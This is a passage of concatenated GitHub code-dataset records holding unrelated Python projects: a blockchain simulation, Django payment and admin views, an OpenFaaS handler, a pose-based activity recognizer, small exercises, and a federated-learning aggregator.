Miner.getEventTime()\r\n if len(nameOptions) > 0:\r\n #Players have been added\r\n if E.playersAdded == True:\r\n if E.numPlayersAdded < 2 and elapsed_time >= previousTime + nextTime: \r\n name = random.choice(nameOptions)\r\n role = Miner.getRole()\r\n nameOptions.remove(str(name))\r\n if role == \"Player\": \r\n eventLimit = P.Players.getEventLimit()\r\n acctBal = P.Players.getAcctBal()\r\n creditLimit = P.Players.getCreditLim(acctBal) \r\n newPlayer = P.Players(name, eventLimit, acctBal, creditLimit)\r\n playerList.append(newPlayer)\r\n MasterPlayerList.append(newPlayer)\r\n if role == \"Miner\":\r\n newPlayer = Miner(name)\r\n minerList.append(newPlayer)\r\n MasterMinerList.append(newPlayer)\r\n E.numPlayersAdded += 1\r\n E.addedPlayers.append(newPlayer)\r\n if E.numPlayersAdded > 0 and elapsed_time >= previousTime + nextTime:\r\n E.addedPlayers.remove(random.choice(E.addedPlayers))\r\n E.numPlayersAdded -= 1\r\n if E.numPlayersAdded == 0:\r\n E.playersAdded = False\r\n \r\n #Players have not been added\r\n if E.playersAdded == False:\r\n if elapsed_time >= previousTime + nextTime: \r\n name = random.choice(nameOptions)\r\n role = Miner.getRole()\r\n nameOptions.remove(str(name))\r\n if role == \"Player\": \r\n eventLimit = P.Players.getEventLimit()\r\n acctBal = P.Players.getAcctBal()\r\n creditLimit = P.Players.getCreditLim(acctBal) \r\n newPlayer = P.Players(name, eventLimit, acctBal, creditLimit)\r\n playerList.append(newPlayer)\r\n MasterPlayerList.append(newPlayer)\r\n if role == \"Miner\":\r\n newPlayer = Miner(name)\r\n minerList.append(newPlayer)\r\n MasterMinerList.append(newPlayer)\r\n E.numPlayersAdded += 1\r\n E.addedPlayers.append(newPlayer)\r\n E.playersAdded = True\r\n \r\n #Generate an event:\r\n for player in playerList:\r\n newEvent = ev.Events(player)\r\n newEvent.actionCode = ev.Events.rollActionCode(newEvent)\r\n newEvent.paymentMethod = ev.Events.getPaymentMethod()\r\n if newEvent.actionCode == 0 or newEvent.actionCode == 1: #Deposits or withdrawls\r\n newEvent.minerTarget = ev.Events.getMinerTarget(minerList)\r\n if newEvent.actionCode == 0:\r\n newEvent.paymentAmt = ev.Events.getPaymentAmt(newEvent)\r\n if newEvent.actionCode == 1:\r\n newEvent.withdrawlAmt = ev.Events.getWithdrawlAmt(newEvent.player)\r\n if newEvent.actionCode == 2: #Transfers\r\n newEvent.transferTarget = ev.Events.getTransferTarget(newEvent.player)\r\n newEvent.transferAmt = ev.Events.getPaymentAmt(newEvent)\r\n newEvent.arrivalTime = elapsed_time\r\n #temporary event list\r\n events.append(newEvent)\r\n \r\n previousTime = elapsed_time \r\n \r\n if elapsed_time > runTime:\r\n print(\"Ceased generating events after \" + str(elapsed_time) + \" seconds without issue.\")\r\n break\r\n \r\n #Filter Bad Events\r\n events = Miner.writeEvents(events, MasterPlayerList, MasterMinerList)\r\n \r\n #Create Priority Event Queue\r\n eventQueue = N.Node.buildLinkedList(events)\r\n #Write Events to File\r\n \r\n events = [x for x in events if x] #Filters out empty list components (Where holds used to be)\r\n df = pd.DataFrame(events)\r\n df.to_csv('transactionRequests.csv', encoding='utf-8', index=False) #Randomly generated transaction requests\r\n \r\n print(\" Event Requests Logged\")\r\n print(\" Executing Events\")\r\n Miner.executeEvents(MasterPlayerList, MasterMinerList, eventQueue)\r\n df = pd.DataFrame(E.requestStatus)\r\n df.to_csv('transactionStatus.csv', encoding='utf-8', index=False) #Banks approval or denial of requsts\r\n \r\n print(\" Getting blocks\")\r\n i = 1\r\n for miner in MasterMinerList:\r\n Miner.getBlockClusters(miner)\r\n i += 1\r\n\r\n print(\"Generating Blockchains\")\r\n for miner in MasterMinerList:\r\n if len(miner.nodeData) > 0:\r\n miner.blockChain = BC.Blockchain()\r\n for i in range(1,len(miner.nodeData)):\r\n string = str(miner.nodeData[i])\r\n string = string.replace(\"'\",\"\")\r\n if string != \"[]\":\r\n miner.blockChain.create_block_from_transaction(string)\r\n #miner.blockChain.display_chain()\r\n miner.blockChain.write_to_file(miner.name)\r\n \r\n P.Players.printPlayerInfo(MasterPlayerList)\r\n \r\n getStatistics(MasterPlayerList, elapsed_time)\r\n \r\n#############################################################\r\n#Establish Players\r\n#A\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nA = P.Players(\"A\",eventLimit, acctBal, creditLimit)\r\n\r\n#B\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal) \r\nB = P.Players(\"B\", eventLimit, acctBal, creditLimit)\r\n\r\n#C\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nC = P.Players(\"C\", eventLimit, acctBal, creditLimit)\r\n\r\n#D\r\neventLimit = P.Players.getEventLimit()\r\nacctBal = P.Players.getAcctBal()\r\ncreditLimit = P.Players.getCreditLim(acctBal)\r\nD = P.Players(\"D\", eventLimit, acctBal, creditLimit)\r\n\r\n#Establish Miner\r\n#E\r\nE = Miner(\"E\")\r\n\r\ngenerateEvents(A, B, C, D, E)","repo_name":"morguhnb/School_Related_Projects","sub_path":"Bitcoin Blockchain Simulation/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":21969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3643619426","text":"class Solution:\n def deleteAndEarn(self, nums: List[int]) -> int:\n total = [0]*(max(nums)+1)\n for val in nums:\n total[val] += val\n\n def rob(nums: List[int]) -> int:\n n = len(nums)\n first, second = nums[0], max(nums[0], nums[1])\n for i in range(2, n):\n first, second = second, max(first+nums[i], second)\n return second\n\n return rob(total)\n# @lc code=end\n","repo_name":"boredcui/LeetCode","sub_path":"DP/740.删除并获得点数.py","file_name":"740.删除并获得点数.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18029685629","text":"import pygame\r\nfrom utility.Constants import loadImageSheet\r\n\r\nclass Button(pygame.sprite.Sprite):\r\n \r\n def __init__(self, centerx, centery, dim, name):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.images, self. rect = loadImageSheet(name, dim)\r\n self.image = self.images[0]\r\n self.rect.center = (centerx, centery)\r\n \r\n def mouseIn(self):\r\n mx, my = pygame.mouse.get_pos()\r\n #Mouse is within bounds of box\r\n return mx > self.rect.left and mx < self.rect.right and my > self.rect.top and my < self.rect.bottom\r\n \r\n def setState(self, state):\r\n self.image = self.images[state]\r\n \r\n def update(self, pressed):\r\n currMouseIn = self.mouseIn()\r\n \r\n if currMouseIn:\r\n if pressed:\r\n self.setState(2)\r\n else:\r\n self.setState(1)\r\n else:\r\n self.setState(0)","repo_name":"XeraRequiem/Disc-Wars","sub_path":"utility/Button.py","file_name":"Button.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40777831870","text":"import json\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import transaction\nfrom django.db.models import F\nfrom django.shortcuts import render_to_response\n\nfrom inv.forms import PagoForm, TransaccionPagoForm\nfrom inv.funciones import model_to_dict_safe, ok_json, bad_json\nfrom inv.models import *\nfrom inv.views import addUserData, convertir_fecha\nfrom spa.settings import (FORMA_PAGO_EFECTIVO, FORMA_PAGO_CHEQUE, FORMA_PAGO_DEPOSITO, FORMA_PAGO_TARJETA,\n FORMA_PAGO_TRANSFERENCIA, FORMA_PAGO_RETENCION)\n\n\nclass ErrorPagos(Exception):\n\n def __init__(self, valor):\n self.valor = valor\n\n def __str__(self):\n return self.valor\n\n\n@login_required(redirect_field_name='ret', login_url='/login')\ndef view(request):\n data = {'title': u'Cobros'}\n addUserData(request, data)\n data['empresa'] = request.session['empresa']\n\n if request.method == 'POST':\n action = request.POST['action']\n\n if action == 'pendientes':\n cliente = Cliente.objects.get(pk=request.POST['cid'])\n ventas = cliente.factura_set.filter(total__gt=F('pagado'), valida=True).order_by('-fecha_vencimiento', 'numero')\n totalpendiente = 0\n totalpagado = 0\n lista = []\n for a in ventas:\n d = model_to_dict_safe(a, exclude=['fecha', 'fecha_vencimiento', 'detalles'])\n d['fecha'] = a.fecha_vencimiento.strftime(\"%d-%m-%Y\")\n d['cantidad_productos'] = a.cantidad_productos()\n totalpendiente += (a.total - a.pagado)\n totalpagado += a.pagado\n lista.append(d)\n\n return ok_json(data={\"datos\": lista, \"totalpendiente\": totalpendiente, \"totalpagado\": totalpagado})\n\n elif action == 'pago':\n datos = json.loads(request.POST['datos'])\n total = 0\n try:\n with transaction.atomic():\n # Facturas seleccionadas\n for documento in datos['ingresosapagar']:\n factura = Factura.objects.get(pk=documento['id'])\n # Pagos asociados\n for p in datos['pagos']:\n if p['formapago'] == str(FORMA_PAGO_EFECTIVO):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechaefectivo']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagoefectivo = PagoEfectivo(pago=pago)\n pagoefectivo.save()\n total += pagoefectivo.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_CHEQUE):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechacheque']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagocheque = PagoCheque(pago=pago,\n numero=p['numerocheque'],\n banco_id=p['bancocheque'],\n postfechado=True if int(p['postfechado']) == 1 else False,\n depositado=True if int(p['depositado']) == 1 else False,\n fechadepositado=convertir_fecha(p['fechadepositado']),\n emite=p['emite'])\n pagocheque.save()\n total += pagocheque.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_DEPOSITO):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechadeposito']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagodeposito = PagoDeposito(pago=pago,\n numero=p['numerodeposito'],\n efectuadopor=p['efectuadopor'])\n pagodeposito.save()\n total += pagodeposito.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_TRANSFERENCIA):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechatransferencia']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagotransferencia = PagoTransferencia(pago=pago,\n numero=p['numerotransferencia'],\n efectuadopor=p['efectuadopor'])\n pagotransferencia.save()\n total += pagotransferencia.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_TARJETA):\n if PagoTarjeta.objects.filter(referencia=p['referencia'], lote=p['lote']).exists():\n return bad_json(extradata={'result': 'repeat'})\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fechatarjeta']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagotarjeta = PagoTarjeta(pago=pago,\n banco_id=p['bancotarjeta'],\n tipotarjeta_id=p['tipotarjeta'],\n poseedor=p['poseedor'],\n procesadorpago_id=p['procesadorpago'],\n referencia=p['referencia'],\n lote=p['lote'])\n pagotarjeta.save()\n total += pagotarjeta.pago.valor\n\n elif p['formapago'] == str(FORMA_PAGO_RETENCION):\n pago = Pago(factura=factura,\n fecha=convertir_fecha(p['fecharetencion']),\n valor=float(p['valor']),\n observaciones=p['observaciones'])\n pago.save()\n pagoretencion = PagoRetencion(pago=pago,\n numero=p['numeroretencion'])\n pagoretencion.save()\n total += pagoretencion.pago.valor\n\n factura.pagado += total\n factura.save()\n\n return ok_json()\n\n except Exception:\n return bad_json(error=1)\n\n return bad_json(error=0)\n\n else:\n try:\n cliente = None\n if 'cid' in request.GET and int(request.GET['cid']) > 0 and Cliente.objects.filter(pk=int(request.GET['cid'])).exists():\n cliente = Cliente.objects.filter(pk=int(request.GET['cid']))[0]\n\n data['hoy'] = hoy = datetime.now().date()\n data['form'] = PagoForm()\n data['form3'] = TransaccionPagoForm(initial={'valor': 0,\n 'fechacheque': hoy,\n 'fechaefectivo': hoy,\n 'fechadeposito': hoy,\n 'fechatransferencia': hoy,\n 'fechatarjeta': hoy,\n 'fechadepositado': hoy})\n data['formasdepago'] = FormaDePago.objects.all()\n data['forma_pago_efectivo'] = FORMA_PAGO_EFECTIVO\n data['forma_pago_cheque'] = FORMA_PAGO_CHEQUE\n data['forma_pago_deposito'] = FORMA_PAGO_DEPOSITO\n data['forma_pago_transferencia'] = FORMA_PAGO_TRANSFERENCIA\n data['forma_pago_tarjeta'] = FORMA_PAGO_TARJETA\n data['forma_pago_retencion'] = FORMA_PAGO_RETENCION\n data['procesadorespago'] = ProcesadorPagoTarjeta.objects.all()\n data['tipostarjeta'] = TipoTarjetaBanco.objects.all()\n data['cliente'] = cliente\n return render_to_response(\"pagos/view.html\", data)\n\n except Exception:\n pass\n","repo_name":"georgenavarro1802/spa","sub_path":"inv/pagos.py","file_name":"pagos.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"333628228","text":"# LISTA DE FORMA ORDENADA E ELIMINADO NUMEROS DIGITADOS REPETIDOS:\n\nlista = []\ncontinuar = ''\n\nwhile True:\n valor = int(input('DIGITE UM VALOR: '))\n contunuar = str(input('DESEJA CONTINUAR [S/N]:')).upper()\n \n if valor not in lista:\n lista.append(valor)\n \n if continuar == 'S':\n continue\n elif contunuar == 'N':\n break\n\nlista.sort() # COLOCA OS NUMEROS EM ORDEM CRESCENTE. NAO COLOCAR DENTRO DE UMA VARIAVEL\nprint(f'OS NUMEROS DIGITADOS FORAM: {lista}')","repo_name":"CarlosNazario2010/Python-Fundamentos-2","sub_path":"10_ListaUnica.py","file_name":"10_ListaUnica.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15899727492","text":"from operator import and_\nfrom django.views import View\nfrom django.shortcuts import render,redirect\nfrom django.contrib.auth.views import LoginView\nfrom django.contrib.auth import authenticate\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login ,logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.cache import cache_control \nfrom .models import NewUserModel, addUsers\nfrom django.contrib.auth.models import User\nfrom .forms import addUserForm\nfrom django.contrib import messages\nfrom django.db.models import Q\n\n\n\n\n\n# HOMEPAGE\n# @cache_control(no_cache=True, must_revalidate=True, no_store=True)\n@method_decorator(login_required,name='dispatch')\n\nclass HomePage(View):\n\n def get(selt,request):\n \n template = 'dashboard.html'\n context = {\n 'my': \"\",\n \n\n \n }\n return render(request,template,context)\n\n \n# LOGINPAGE\n\nclass LoginPage(LoginView):\n\n template_name = 'login.html'\n\n def get(self, request, *args, **kwargs):\n context ={}\n context['form'] = addUsers()\n return render(request,self.template_name, context)\n def post(self, request, *args, **kwargs):\n print(request.POST['username'])\n print(request.POST['password'])\n user = authenticate(request, username=request.POST['username'], password=request.POST['password'])\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse('home'))\n return HttpResponseRedirect(reverse('login'))\n \n\ndef logout(request):\n auth_logout(request)\n return HttpResponseRedirect(reverse('login'))\n\n\n# table\n@method_decorator(login_required,name='dispatch')\n\nclass Table(View):\n def get(self, request, *args, **kwargs):\n\n template = 'tables.html'\n context = {\n 'data': \"Table\",\n }\n return render(request,template,context)\n\n\n# billing\n@method_decorator(login_required,name='dispatch')\n\nclass Billing(View):\n def get(self, request, *args, **kwargs):\n\n template = 'billing.html'\n context = {\n 'data': \"Billing\", \n }\n return render(request,template,context)\n\n# Notifications\n@method_decorator(login_required,name='dispatch')\n\nclass Notification(View):\n def get(self, request, *args, **kwargs):\n\n template = 'notifications.html'\n context = {\n 'data': \"Notification\",\n }\n return render(request,template,context)\n\n# Profile\n@method_decorator(login_required,name='dispatch')\n\nclass User(View):\n def get(self, request, *args, **kwargs):\n\n template = 'user.html'\n context = {\n 'data': \"User Details\",\n }\n return render(request,template,context)\n\n# stocks\n@method_decorator(login_required,name='dispatch')\n\nclass Stocks(View):\n def get(self, request, *args, **kwargs):\n\n template = 'stocks.html'\n context = {\n 'data': \"Stock Details\",\n }\n return render(request,template,context)\n\n\n# addUserForm\n@method_decorator(login_required,name='dispatch')\n\nclass AddUser(View):\n template = 'user/adduser.html'\n def get(self, request, *args, **kwargs):\n\n form = addUserForm()\n \n context = {'form': form,\n 'data': 'Add User'}\n return render(request,self.template,context)\n\n def post(self, request, *args, **kwargs):\n if request.method == 'POST':\n form = addUserForm(request.POST)\n if form.is_valid():\n # print(form.cleaned_data.get('nothing'))\n form.save()\n messages.success(request, 'Form submission successful')\n return redirect('adduser')\n else:\n form = addUserForm()\n return render(request, self.template, {'form': form, 'title':'register here'})\n\n# UserTable\n@method_decorator(login_required,name='dispatch')\nclass UserTable(View):\n template = 'user/usertable.html'\n def get(self, request, *args, **kwargs):\n\n userData = NewUserModel.objects.filter(~Q(username ='admin')).values()\n print(userData)\n \n context = { 'userData':userData,\n 'data': 'User Table'}\n return render(request,self.template,context)\n\n\n# def page_not_found(request,*args):\n# return render(request, 'hello.html', status=404)\n\n \n\n# def logined(request):\n\n# username = \"not logged in\"\n \n# if request.method == \"POST\":\n# #Get the posted form\n# MyLoginForm = AdminInputForm(request.POST)\n \n# if MyLoginForm.is_valid():\n# username = MyLoginForm.cleaned_data['username']\n# password = MyLoginForm.cleaned_data['password']\n# else:\n# MyLoginForm = AdminInputForm()\n\t\t\n# return render(request, 'login.html', {\"username\" : username,\"password\" : password})\n\n # def post(self, request, *args, **kwargs):\n\n # # mydata = Users.objects.filter(username = \"admin\").values()\n # # d = list(mydata)\n # # new = d[0]\n # # usernamedb = new['username']\n # # passworddb = new['password']\n\n\n # form = AdminInputForm()\n\n # if form.is_valid():\n \n # username = form.cleaned_data.get('username')\n # password = form.cleaned_data.get('password')\n \n\n \n # return render(request=request, template_name=\"login.html\", context={\"login_form\":username, \"user\":password})\n\n\n\n\n\n \n \n\n\n\n\n","repo_name":"rohithka/django","sub_path":"task_3/adminPanel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4508489302","text":"import json, os, sys\nfrom bson.json_util import dumps\nfrom function import ds_util\n\ndef format_posts(data):\n posts = data[\"posts\"]\n posts.sort(key = lambda i: i['timestamp'], reverse=True)\n return posts\n\ndef handle(req):\n \"\"\"Client API to read the timeline of a user\n\n Calls user-timeline-service-read-user-timeline to acquire a user's timeline,\n formats the data in the right fashion and return it back to the client\n (e.g., a browser).\n\n Args:\n req (str): request body\n \"\"\"\n payload = json.loads(req)\n\n if ('user_id' not in payload or\n 'start' not in payload or\n 'stop' not in payload):\n msg = '''Make sure the input has `user_id`, `start`, `stop`'''\n ret = json.dumps({\"status\":\"MissingFieldError\", \"message\":msg})\n sys.exit(ret)\n\n function_url = \"http://gateway.openfaas:8080/function/user-timeline-service-read-user-timeline\"\n\n ret = ds_util.invoke(function_url, payload)\n\n if ret[\"http_status_code\"] != 200:\n return dumps({\"status\": \"UserTimelineReadFrontendError\",\n \"errors\":[ret]\n })\n\n return dumps({\"status\": \"success\", \"posts\":format_posts(ret)})\n","repo_name":"LedgeDash/DeathStarFaaS","sub_path":"user-timeline-read-frontend/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"39795742454","text":"\r\nimport numpy as np\r\nimport cv2\r\nimport mediapipe as mp\r\nimport pandas as pd\r\nimport threading\r\nimport tensorflow as tf\r\n\r\nlabel = \".....\"\r\nn_timesteps = 10\r\nlm_list=[] #luu gia tri cua khung xuong\r\n\r\nmodel = tf.keras.models.load_model(\"model1.h5\")\r\n\r\n#doc anh tu webcam\r\ncap = cv2.VideoCapture(0)\r\n\r\n#khoi tao thu vien mediapipe\r\nmpPose = mp.solutions.pose\r\npose = mpPose.Pose()\r\nmpDraw = mp.solutions.drawing_utils\r\n\r\ndef make_landmark_timestep(results):\r\n #print(results.pose_landmarks.landmark) #toa do cac diem tren khung xuong\r\n c_lm = []\r\n for id, lm in enumerate(results.pose_landmarks.landmark):\r\n c_lm.append(lm.x)\r\n c_lm.append(lm.y)\r\n c_lm.append(lm.z)\r\n c_lm.append(lm.visibility)\r\n return c_lm\r\n\r\ndef draw_landmark_on_image(mpDraw, results, img):\r\n #ve cac duong noi\r\n mpDraw.draw_landmarks(img, results.pose_landmarks, mpPose.POSE_CONNECTIONS)\r\n\r\n #ve cac diem nut\r\n for id, lm in enumerate(results.pose_landmarks.landmark):\r\n h, w, c = img.shape\r\n print(id, lm)\r\n cx, cy = int(lm.x+w), int(lm.y+h)\r\n cv2.circle(img, (cx, cy), 10, (0, 0, 255), cv2.FILLED) #red1\r\n return img \r\n\r\ndef draw_class_on_image(label, img): #gán nhãn lên ảnh\r\n font = cv2.FONT_HERSHEY_COMPLEX\r\n bottomLeftCornerOfText = (10, 30)\r\n fontScale = 1\r\n fontColor = (0, 255, 0) #green1\r\n thickness = 2\r\n lineType = 2\r\n cv2.putText(img, label, bottomLeftCornerOfText, font, fontScale, fontColor, thickness, lineType)\r\n return img\r\n\r\ndef detect(model, lm_list):\r\n global label\r\n lm_list = np.array(lm_list)\r\n lm_list = np.expand_dims(lm_list, axis=0)\r\n #print(lm_list.shape)\r\n results=model.predict(lm_list)\r\n print(\"results:\", results)\r\n if results[0][0] > 0.5:\r\n label = \"body swing\" #lắc người\r\n else: \r\n label = \"hand swing\" #vẫy tay\r\n return label\r\n\r\n\r\ni = 0\r\nwarmup_frames = 60\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) #chuyen anh sang mau xam\r\n results=pose.process(imgRGB)\r\n i = i + 1\r\n if i > warmup_frames:\r\n print(\"Start detect...\")\r\n\r\n if results.pose_landmarks:\r\n #ghi nhan thong so khung xuong\r\n c_lm = make_landmark_timestep(results)\r\n lm_list.append(c_lm) \r\n\r\n if len(lm_list) == n_timesteps:\r\n #predict\r\n t1 = threading.Thread(target=detect, args=(model, lm_list,))\r\n t1.start()\r\n lm_list=[]\r\n #ve khung xuong len anh\r\n img = draw_landmark_on_image(mpDraw, results, img)\r\n \r\n img = draw_class_on_image(label, img)\r\n cv2.imshow(\"Image\", img)\r\n if cv2.waitKey(1) == ord('q'):\r\n break\r\n\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"Thunga269/Machine-Learning---Deep-Learning","sub_path":"human activity regconition/inreference_lstm.py","file_name":"inreference_lstm.py","file_ext":"py","file_size_in_byte":2830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2512654567","text":"\"\"\"Aula 12 - Desafio 04.\"\"\"\n\nfrom datetime import date\nnasc = int(input('Qual o seu ano de nascimento (aaaa)? '))\nidade = date.today().year - nasc\nif idade < 18:\n print('É muito cedo pra você se alistar. '\n 'Falta(m) {} ano(s) para o seu alistamento.'.format(18 - idade))\nelif idade == 18:\n print('Esta na hora de se alistar!')\nelse:\n print('Você deveria ter se alistado a {} ano(s) atrás. '\n 'Espero que você já esteja alistado.'.format(idade - 18))\n","repo_name":"gustavogattino/Curso-em-Video-Python","sub_path":"Mundo 2 - Basico/Aula12/aula12_desafio04.py","file_name":"aula12_desafio04.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23947769022","text":"# 正着数和倒着数都一样,输出所有的这样的四位数\n# 如 1221\n\ndef is_pal(i_):\n i_s = str(i_) # 转为字符串,可倒置\n if i_s == i_s[::-1]:\n return True\n else:\n return False\n\n\ni = 1000\nwhile i < 10000:\n if is_pal(i):\n print(i)\n i += 1\n\n","repo_name":"Hainuo-Wang/Lanqiao_Cup","sub_path":"第十四届蓝桥杯/2.基础篇/2.6 回文数.py","file_name":"2.6 回文数.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28236895913","text":"import logging\nimport time\nfrom copy import deepcopy\n\nfrom diskcache import Cache\nfrom flame.channel_manager import ChannelManager\nfrom flame.common.custom_abcmeta import ABCMeta, abstract_attribute\nfrom flame.common.util import (\n MLFramework,\n delta_weights_pytorch,\n delta_weights_tensorflow,\n get_ml_framework_in_use,\n valid_frameworks,\n)\nfrom flame.config import Config\nfrom flame.mode.composer import Composer\nfrom flame.mode.message import MessageType\nfrom flame.mode.role import Role\nfrom flame.mode.tasklet import Loop, Tasklet\nfrom flame.optimizer.train_result import TrainResult\nfrom flame.optimizers import optimizer_provider\nfrom flame.plugin import PluginManager\n\nlogger = logging.getLogger(__name__)\n\nTAG_DISTRIBUTE = \"distribute\"\nTAG_AGGREGATE = \"aggregate\"\nTAG_FETCH = \"fetch\"\nTAG_UPLOAD = \"upload\"\n\n# 60 second wait time until a trainer appears in a channel\nWAIT_TIME_FOR_TRAINER = 60\n\n\nclass MiddleAggregator(Role, metaclass=ABCMeta):\n \"\"\"Middle level aggregator.\n\n It acts as a proxy between top level aggregator and trainer.\n \"\"\"\n\n @abstract_attribute\n def config(self) -> Config:\n \"\"\"Abstract attribute for config object.\"\"\"\n\n def internal_init(self) -> None:\n \"\"\"Initialize internal state for role.\"\"\"\n # global variable for plugin manager\n self.plugin_manager = PluginManager()\n\n self.cm = ChannelManager()\n self.cm(self.config)\n self.cm.join_all()\n\n self.optimizer = optimizer_provider.get(\n self.config.optimizer.sort, **self.config.optimizer.kwargs\n )\n\n self._round = 1\n self._work_done = False\n\n # disk cache is used for saving memory in case model is large\n # automatic eviction of disk cache is disabled with cull_limit 0\n self.cache = Cache()\n self.cache.reset(\"size_limit\", 1e15)\n self.cache.reset(\"cull_limit\", 0)\n\n self.dataset_size = 0\n\n # save distribute tag in an instance variable\n self.dist_tag = TAG_DISTRIBUTE\n\n self.framework = get_ml_framework_in_use()\n if self.framework == MLFramework.UNKNOWN:\n raise NotImplementedError(\n \"supported ml framework not found; \"\n f\"supported frameworks are: {valid_frameworks}\"\n )\n\n if self.framework == MLFramework.PYTORCH:\n self._delta_weights_fn = delta_weights_pytorch\n\n elif self.framework == MLFramework.TENSORFLOW:\n self._delta_weights_fn = delta_weights_tensorflow\n\n def get(self, tag: str) -> None:\n \"\"\"Get data from remote role(s).\"\"\"\n if tag == TAG_FETCH:\n self._fetch_weights(tag)\n if tag == TAG_AGGREGATE:\n self._aggregate_weights(tag)\n\n def put(self, tag: str) -> None:\n \"\"\"Set data to remote role(s).\"\"\"\n if tag == TAG_UPLOAD:\n self._send_weights(tag)\n if tag == TAG_DISTRIBUTE:\n self._distribute_weights(tag)\n\n def _fetch_weights(self, tag: str) -> None:\n logger.debug(\"calling _fetch_weights\")\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"[_fetch_weights] channel not found with tag {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n msg, _ = channel.recv(end)\n\n if MessageType.WEIGHTS in msg:\n self.weights = msg[MessageType.WEIGHTS]\n\n if MessageType.EOT in msg:\n self._work_done = msg[MessageType.EOT]\n\n if MessageType.ROUND in msg:\n self._round = msg[MessageType.ROUND]\n\n def _distribute_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel not found for tag {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n self.trainer_no_show = channel.await_join(WAIT_TIME_FOR_TRAINER)\n if self.trainer_no_show:\n logger.debug(\"channel await join timeouted\")\n # send dummy weights to unblock top aggregator\n self._send_dummy_weights(TAG_UPLOAD)\n return\n\n for end in channel.ends():\n logger.debug(f\"sending weights to {end}\")\n channel.send(\n end,\n {\n MessageType.WEIGHTS: self.weights,\n MessageType.ROUND: self._round,\n },\n )\n\n def _aggregate_weights(self, tag: str) -> None:\n channel = self.cm.get_by_tag(tag)\n if not channel:\n return\n\n total = 0\n # receive local model parameters from trainers\n for msg, metadata in channel.recv_fifo(channel.ends()):\n end, _ = metadata\n if not msg:\n logger.debug(f\"No data from {end}; skipping it\")\n continue\n\n if MessageType.WEIGHTS in msg:\n weights = msg[MessageType.WEIGHTS]\n\n if MessageType.DATASET_SIZE in msg:\n count = msg[MessageType.DATASET_SIZE]\n\n logger.debug(f\"{end}'s parameters trained with {count} samples\")\n\n if weights is not None and count > 0:\n total += count\n tres = TrainResult(weights, count)\n # save training result from trainer in a disk cache\n self.cache[end] = tres\n\n logger.debug(f\"received {len(self.cache)} trainer updates in cache\")\n\n # optimizer conducts optimization (in this case, aggregation)\n global_weights = self.optimizer.do(\n deepcopy(self.weights), self.cache, total=total\n )\n if global_weights is None:\n logger.debug(\"failed model aggregation\")\n time.sleep(1)\n return\n\n # save global weights before updating it\n self.prev_weights = self.weights\n\n # set global weights\n self.weights = global_weights\n self.dataset_size = total\n\n def _send_weights(self, tag: str) -> None:\n logger.debug(\"calling _send_weights\")\n channel = self.cm.get_by_tag(tag)\n if not channel:\n logger.debug(f\"channel not found with {tag}\")\n return\n\n # this call waits for at least one peer to join this channel\n channel.await_join()\n\n # one aggregator is sufficient\n end = channel.one_end()\n\n delta_weights = self._delta_weights_fn(self.weights, self.prev_weights)\n\n msg = {\n MessageType.WEIGHTS: 